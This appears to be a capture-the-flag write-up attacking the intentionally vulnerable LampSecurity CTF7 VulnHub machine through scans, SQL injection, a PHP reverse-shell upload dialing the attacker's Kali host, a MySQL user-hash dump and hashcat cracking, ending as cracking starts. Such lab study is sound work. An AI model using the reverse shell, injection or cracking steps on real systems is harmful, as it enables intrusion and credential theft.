Target overview
LampSecurity CTF7, a VulnHub target machine
Host discovery
Because of a configuration quirk in this VM, the target's IP may not show up in the scan at all.
Pay attention to this: the first time you power the VM on, VMware asks whether you copied or moved it. Pick "I moved it", which keeps the network configuration exactly as it shipped; picking "copied" can leave the target invisible to host discovery. If discovery still fails after that, don't panic, just re-import the VM. The tip comes from the post linked below.
(https://blog.csdn.net/Bossfrank/article/details/131324929)
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:32 CST
Nmap scan report for 192.168.50.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00011s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.156
Host is up (0.000081s latency).
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:05:7B (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.90 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:42 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00044s latency).
Not shown: 65505 filtered tcp ports (no-response), 21 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:46 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
5900/tcp closed vnc
8080/tcp open http Apache httpd 2.2.15 ((CentOS))
10000/tcp open http MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (96%), Linux 2.6.32 - 3.10 (94%), Linux 2.6.32 (92%), Linux 3.2 - 3.8 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Tandberg Video Conference System (91%), Linux 2.6.32 - 3.1 (91%), Linux 2.6.32 - 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.89 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 1000 -p- 192.168.50.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:49 CST
Warning: 192.168.50.156 giving up on port because retransmission cap hit (10).
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00039s latency).
All 65535 scanned ports on bogon (192.168.50.156) are in ignored states.
Not shown: 64800 open|filtered udp ports (no-response), 735 filtered udp ports (host-prohibited)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 719.01 seconds
Vulnerability script scan. It took almost an hour here, most likely because the vuln category includes scripts that spider the web app, hold connections open on purpose (http-slowloris-check), and wait out SMB timeouts. One caveat on the results below: smb-vuln-cve2009-3103 reporting VULNERABLE is a false positive on this host, since CVE-2009-3103 is a bug in Windows srv2.sys and this box runs Samba on CentOS; the Slowloris result is only a heuristic as well.
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:32 CST
Stats: 0:26:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.80% done; ETC: 12:00 (0:00:53 remaining)
Stats: 0:35:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.34% done; ETC: 12:09 (0:00:59 remaining)
Stats: 0:43:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.22% done; ETC: 12:16 (0:00:47 remaining)
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00030s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum:
|_ /login.php: Possible admin folder
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 3316.13 seconds
Web exploitation
Trying SQL injection
Tried SQL injection against the login on port 8080. It failed at first, apparently because of the comment syntax used by this MySQL version. The application returns an SQL error worth reading: as db.php (shown later) makes clear, a failed query dies and prints the whole query back, which tells you exactly how the payload landed.
Adjusted for that, the injection succeeds.
There is a file upload, so try uploading a web shell. Start a listener on Kali on the port the payload dials back to (1234 here) before requesting the file.
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ vim shell.php
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat shell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/1234 0>&1'"); ?>
Next, find where shell.php landed so that requesting it makes the server connect back to Kali.
Directory brute-force: the uploaded file shows up under /assets/, which is also listable.
┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.156/
[sudo] password for kali:
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 27 13:54:34 2024
URL_BASE: http://192.168.50.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.50.156/ ----
+ http://192.168.50.156/about (CODE:200|SIZE:4910)
==> DIRECTORY: http://192.168.50.156/assets/
+ http://192.168.50.156/backups (CODE:301|SIZE:333)
+ http://192.168.50.156/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.50.156/contact (CODE:200|SIZE:5017)
==> DIRECTORY: http://192.168.50.156/css/
+ http://192.168.50.156/db (CODE:200|SIZE:3904)
+ http://192.168.50.156/default (CODE:200|SIZE:6058)
+ http://192.168.50.156/footer (CODE:200|SIZE:3904)
+ http://192.168.50.156/header (CODE:200|SIZE:3904)
==> DIRECTORY: http://192.168.50.156/img/
==> DIRECTORY: http://192.168.50.156/inc/
+ http://192.168.50.156/index.php (CODE:200|SIZE:6058)
==> DIRECTORY: http://192.168.50.156/js/
+ http://192.168.50.156/newsletter (CODE:200|SIZE:4037)
+ http://192.168.50.156/phpinfo (CODE:200|SIZE:58734)
+ http://192.168.50.156/profile (CODE:200|SIZE:3977)
+ http://192.168.50.156/read (CODE:302|SIZE:1)
+ http://192.168.50.156/recovery (CODE:200|SIZE:4807)
+ http://192.168.50.156/register (CODE:200|SIZE:6591)
+ http://192.168.50.156/signup (CODE:200|SIZE:4783)
+ http://192.168.50.156/usage (CODE:403|SIZE:287)
==> DIRECTORY: http://192.168.50.156/webalizer/
==> DIRECTORY: http://192.168.50.156/webmail/
---- Entering directory: http://192.168.50.156/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/webalizer/ ----
+ http://192.168.50.156/webalizer/index.html (CODE:200|SIZE:3631)
---- Entering directory: http://192.168.50.156/webmail/ ----
+ http://192.168.50.156/webmail/bin (CODE:403|SIZE:293)
+ http://192.168.50.156/webmail/config (CODE:403|SIZE:296)
+ http://192.168.50.156/webmail/favicon.ico (CODE:200|SIZE:1150)
+ http://192.168.50.156/webmail/index.php (CODE:200|SIZE:5157)
==> DIRECTORY: http://192.168.50.156/webmail/installer/
+ http://192.168.50.156/webmail/LICENSE (CODE:403|SIZE:297)
+ http://192.168.50.156/webmail/logs (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.50.156/webmail/plugins/
==> DIRECTORY: http://192.168.50.156/webmail/program/
+ http://192.168.50.156/webmail/README (CODE:403|SIZE:296)
+ http://192.168.50.156/webmail/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.50.156/webmail/skins/
+ http://192.168.50.156/webmail/SQL (CODE:403|SIZE:293)
+ http://192.168.50.156/webmail/temp (CODE:403|SIZE:294)
---- Entering directory: http://192.168.50.156/webmail/installer/ ----
==> DIRECTORY: http://192.168.50.156/webmail/installer/images/
+ http://192.168.50.156/webmail/installer/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.50.156/webmail/plugins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/emoticons/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/userinfo/
---- Entering directory: http://192.168.50.156/webmail/program/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/webmail/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/
---- Entering directory: http://192.168.50.156/webmail/installer/images/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/
---- Entering directory: http://192.168.50.156/webmail/plugins/emoticons/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/help/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/content/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/
---- Entering directory: http://192.168.50.156/webmail/plugins/password/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/drivers/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/helpers/
+ http://192.168.50.156/webmail/plugins/password/README (CODE:200|SIZE:10645)
---- Entering directory: http://192.168.50.156/webmail/plugins/userinfo/ ----
---- Entering directory: http://192.168.50.156/webmail/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/includes/
+ http://192.168.50.156/webmail/skins/classic/README (CODE:200|SIZE:855)
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/templates/
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/classic/
---- Entering directory: http://192.168.50.156/webmail/plugins/help/content/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/
---- Entering directory: http://192.168.50.156/webmail/plugins/password/drivers/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/password/helpers/ ----
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/buttons/
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/display/
+ http://192.168.50.156/webmail/skins/classic/images/favicon.ico (CODE:200|SIZE:1150)
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/icons/
---- Entering directory: http://192.168.50.156/webmail/skins/classic/includes/ ----
---- Entering directory: http://192.168.50.156/webmail/skins/classic/templates/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/classic/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/buttons/ ----
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/display/ ----
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/icons/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/ ----
-----------------
END_TIME: Fri Sep 27 13:59:21 2024
DOWNLOADED: 124624 - FOUND: 32
Requesting shell.php from the /assets/ listing shows the server parses it as PHP: the payload runs and the listener waiting on Kali (192.168.50.147:1234) receives a shell. Two misconfigurations make this work: the upload accepts a .php file, and the upload directory sits inside the web root with the PHP handler enabled. Storing uploads outside the document root, or disabling script execution in that directory, would have blocked it.
Initial shell
Basic information
bash-4.1$ sudo -l
sudo -l
sudo: sorry, you must have a tty to run sudo
bash-4.1$ dpkg -l
dpkg -l
bash: dpkg: command not found
bash-4.1$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ff
inet 192.168.50.156/24 brd 192.168.50.255 scope global eth0
inet6 fe80::20c:29ff:fe9d:12a9/64 scope link
valid_lft forever preferred_lft forever
bash-4.1$ python --version
python --version
Python 2.6.6
bash-4.1$ uname -a
uname -a
Linux bogon 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux
bash-4.1$ whoami
whoami
apache
bash-4.1$
Upgrade the shell with Python
sudo -l failed above with "you must have a tty to run sudo" because the default sudoers on CentOS 6 sets requiretty; spawning a pty with Python gets past that check. sudo then asks for apache's password, which we don't have, so a few guesses fail:
bash-4.1$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
bash-4.1$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for apache: exit
Sorry, try again.
[sudo] password for apache: root
Sorry, try again.
[sudo] password for apache: admin
Sorry, try again.
sudo: 3 incorrect password attempts
Local enumeration on the box
bash-4.1$ pwd
pwd
/var/www/html/assets
bash-4.1$ cd /var/www
cd /var/www
bash-4.1$ ls
ls
admin cgi-bin error html icons
bash-4.1$ cd admin
cd admin
bash-4.1$ ls
ls
docs index.php newsletters.php reservations.php
feedback.php login.php phpmyadmin trainings.php
inc logout.php readings.php users.php
bash-4.1$ ls -liah
ls -liah
total 68K
260349 drwxrwxr-x. 5 webdev webdev 4.0K Dec 19 2012 .
259983 drwxr-xr-x. 7 root root 4.0K Dec 19 2012 ..
260460 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11 2012 docs
260476 -rw-rw-r--. 1 webdev webdev 1.5K Dec 24 2012 feedback.php
260436 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11 2012 inc
260351 -rw-r--r--. 1 webdev webdev 314 Dec 24 2012 index.php
260442 -rw-rw-r--. 1 webdev webdev 885 Dec 24 2012 login.php
260445 -rw-rw-r--. 1 webdev webdev 236 Dec 24 2012 logout.php
260472 -rw-rw-r--. 1 webdev webdev 3.8K Dec 24 2012 newsletters.php
270632 drwxr-xr-x. 9 root root 4.0K Dec 19 2012 phpmyadmin
260471 -rw-rw-r--. 1 webdev webdev 6.5K Dec 24 2012 readings.php
270635 -rw-rw-r--. 1 webdev webdev 2.5K Dec 24 2012 reservations.php
260439 -rw-rw-r--. 1 webdev webdev 5.6K Dec 24 2012 trainings.php
260447 -rw-rw-r--. 1 webdev webdev 4.8K Dec 24 2012 users.php
bash-4.1$ cd inc
cd inc
bash-4.1$ ls
ls
admin_footer.php admin_header.php base.php db.php
bash-4.1$
The admin app's include directory holds a database connection file:
bash-4.1$ cat db.php
cat db.php
<?php
/**
* This file is part of the LAMPSecurity CTF 7
* http://sourceforge.net/projects/lampsecurity
* by Justin C. Klein Keane
*/
class DatabaseConnection {
public function __construct() {
$this->conn = mysql_connect('localhost', 'root', ''); // Change in prod
if (!$this->conn) die('Could not connect: ' . mysql_error());
mysql_select_db('website');
}
public function query($query) {
$result = mysql_query($query);
if (!$result) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $query;
die($message);
}
$retval = array();
while ($row = mysql_fetch_assoc($result)) $retval[] = $row;
return $retval;
}
}
function dbin($string) {
return mysql_real_escape_string($string);
}
$db = new DatabaseConnection();
bash-4.1$
Log in to MySQL. db.php connects as root with an empty password, so mysql -uroot needs none. (The mysql client needs a proper tty for its prompt and echo, which is why upgrading the shell with Python right after catching it is the usual first step.)
bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ mysql -uroot
mysql -uroot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 88
Server version: 5.1.66 Source distribution
Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
List the databases:
mysql>
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| roundcube |
| website |
+--------------------+
4 rows in set (0.00 sec)
mysql> use website
use website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| contact |
| documents |
| hits |
| log |
| newsletter |
| payment |
| trainings |
| trainings_x_users |
| users |
+-------------------+
9 rows in set (0.00 sec)
mysql>
Look at the users table:
mysql> select * from users;
select * from users;
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| username | password | is_admin | last_login | user_id | realname | profile |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 | 1 | 2012-12-19 11:30:54 | 3 | Brian Hershel | Brian is our technical brains behind the operations and a chief trainer. |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 | 1 | NULL | 4 | John Durham | |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 | 1 | NULL | 5 | Alice Wonder | |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 | 1 | NULL | 6 | Ruby Spinster | |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a | 1 | NULL | 7 | Leon Parnetta | |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 | 1 | NULL | 8 | Julia Fields | |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 | 0 | NULL | 9 | Michael Saint | |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e | 0 | NULL | 10 | Bruce Pottricks | |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 | 0 | NULL | 11 | Neil Felstein | |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf | 0 | NULL | 12 | Charles Adams | |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a | 0 | NULL | 36 | | |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 | 0 | NULL | 113 | | |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
12 rows in set (0.00 sec)
The password column holds 32 hex characters with no salt or prefix, i.e. unsalted MD5 (test@nowhere.com's 098f6bcd4621d373cade4e832627b4f6 is the MD5 of "test"). Select just username and password to take them offline for cracking:
mysql> select username,password from users
select username,password from users
-> ;
;
+-------------------------------+----------------------------------+
| username | password |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 |
+-------------------------------+----------------------------------+
12 rows in set (0.00 sec)
mysql>
Copy the username/hash rows to Kali (saved as creds.lst) and clean them up with awk.
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat creds.lst
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 |
Use awk to pull the usernames into users.lst (the fiddly data wrangling red teaming is full of). With the default whitespace separator the leading "|" is field 1 and the address is field 2; a second awk on "@" strips the domain, since the local part is the likely login name:
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}'
[sudo] password for kali:
brian@localhost.localdomain
john@localhost.localdomain
alice@localhost.localdomain
ruby@localhost.localdomain
leon@localhost.localdomain
julia@localhost.localdomain
michael@localhost.localdomain
bruce@localhost.localdomain
neil@localhost.localdomain
charles@localhost.localdomain
foo@bar.com
test@nowhere.com
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}'
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}' > users.lst
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat users.lst
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test
Extract the hashes the same way; they are field 4:
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}'
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}' > hash.lst
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hash.lst
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6
Identify the hash type. hash-identifier lists MD5 first, as expected for 32 hex characters with no salt or prefix:
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hash-identifier 'e22f07b17f98e0d9d364584ced0e3c18'
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Crack the MD5 hashes with hashcat: -m 0 is raw MD5, -a 0 a straight dictionary attack with rockyou.txt. Eight of the twelve fall to the wordlist in a few seconds; the other four would need rules or a bigger list.
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hashcat -m 0 -a 0 hash.lst /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
